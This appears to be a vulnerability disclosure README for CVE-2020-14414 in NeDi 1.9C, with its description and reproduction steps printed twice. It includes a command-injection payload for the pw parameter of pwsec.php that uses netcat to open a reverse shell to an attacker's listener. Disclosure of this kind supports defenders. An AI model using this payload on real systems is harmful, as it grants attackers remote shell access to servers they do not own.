farid007/NeDi 1.9C RCE

## NeDi 1.9C RCE
CVE-2020-14414

NeDi 1.9C is vulnerable to Remote Command Execution. pwsec.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a pw parameter. (This can also be exploited via CSRF.)


Steps To Reproduce-:
>
> Login with the credential.
> Go to https://ip/pwsec.php.
> Insert any data in the first field then intercept the request.
> Insert this command (';nc ip port -e /bin/bash;') and start listener on port  (Note we need to use ' (single quote)).
> You will be greeted with a shell.
	CVE-2020-14414

	NeDi 1.9C is vulnerable to Remote Command Execution. pwsec.php improperly escapes shell metacharacters from a POST request. An attacker can exploit this by crafting an arbitrary payload (any system commands) that contains shell metacharacters via a POST request with a pw parameter. (This can also be exploited via CSRF.)


	Steps To Reproduce-:
	>
	> Login with the credential.
	> Go to https://ip/pwsec.php.
	> Insert any data in the first field then intercept the request.
	> Insert this command (';nc ip port -e /bin/bash;') and start listener on port (Note we need to use ' (single quote)).
	> You will be greeted with a shell.